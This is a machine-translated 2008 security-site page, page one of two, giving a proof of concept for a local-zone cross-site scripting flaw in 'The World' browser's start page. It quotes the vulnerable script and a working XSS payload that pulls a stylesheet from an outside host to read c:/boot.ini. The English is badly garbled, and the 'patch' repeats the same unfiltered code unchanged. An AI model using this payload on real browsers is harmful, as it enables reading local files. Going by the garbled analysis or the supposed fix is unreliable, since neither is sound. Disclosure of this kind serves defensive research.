Hot Articles
Recommend Articles
New Articles
World browser local xss and so on window of cross territory crack POC
Add date:
07/09/2008
Publishing date:
07/09/2008
Hits:
100
Total 2 pages, Current page:1, Jump to page: 1 2
Crack explanation: http://www.80sec.com/360-sec-browser-localzone-xss.html Documents origin: http://www.80sec.com/release/The-world-browser-locale-zone-xss-POC.txt Crack analysis: Window of browser the world is processes in the outset page by the res://E:\PROGRA ~1 \ THEWOR~1.0 \ languages \ chs.dll/TWHOME.HTM form, but because lacks to the res agreement security essential control, causes page's jurisdiction to be very high, but in this page exists a xss question will cause the local cross territory crack, the simple analysis is as follows: <script language= " JavaScript " > var nOldCount = 0; for (i = 0; i < g_nCountOld; i ++) { str_url = g_arr_argUrlOld[i]; str_name = g_arr_argNameOld[i]; str_td = “<tr ID='twOldItem” + i +” `><td valign='top' width='64 ' ><div align='right'><a style='cursor:hand' title='shanchu works as antecedent ' onclick= \” javascript: tw_DeleteItemOld ('” +i+” `); \” >” + “<img border='0 ' src='twpage_delete.gif' width='16 ' height='16 ' ></div></a></td>”; document.write (str_td); str_td = “<td><a target='_blank' href='" + str_url + “`>” + str_name + “</a></td></tr>”; document.write (str_td); nOldCount = i; g_bHasLastUrl = true; } </script> str_name and str_url not after filtration direct output, because this page is in the local safety zone, therefore has the very high jurisdiction, may make the multispan territory operation, including read document and movement local procedure. Crack patching: <script language= " JavaScript " > var nOldCount = 0; for (i = 0; i < g_nCountOld; i ++) { str_url = g_arr_argUrlOld[i]; str_name = g_arr_argNameOld[i]; str_td = “<tr ID='twOldItem” + i +” `><td valign='top' width='64 ' ><div align='right'><a style='cursor:hand' title='shanchu works as antecedent ' onclick= \” javascript: tw_DeleteItemOld ('” +i+” `); \” >” + “<img border='0 ' src='twpage_delete.gif' width='16 ' height='16 ' ></div></a></td>”; document.write (str_td); str_td = “<td><a target='_blank' href='" + str_url + “`>” + str_name + “</a></td></tr>”; document.write (str_td); nOldCount = i; g_bHasLastUrl = true; } </script> Already used js to control DOM to demonstrate Crack demonstration: Here provides the test method to be possible to read c:/boot.ini 1 opens the following address sc:h'><script>alert (document.write (unescape (” %3CLINK%20REL%3D%22stylesheet%22%20HREF%3D%22http%3A%2f% 2fwww.80sec.com/1.css%22%3E”)))</script> above 2 will cause the page which cannot be visited, then closes the tw browser directly (not good means crash)
Other pages: 1 2 * Next>>
Comment:
Category:
Home
>
crack analyzes
You are here: hacking technology
> crack analyzes
> Content
Category: Home
> crack analyzes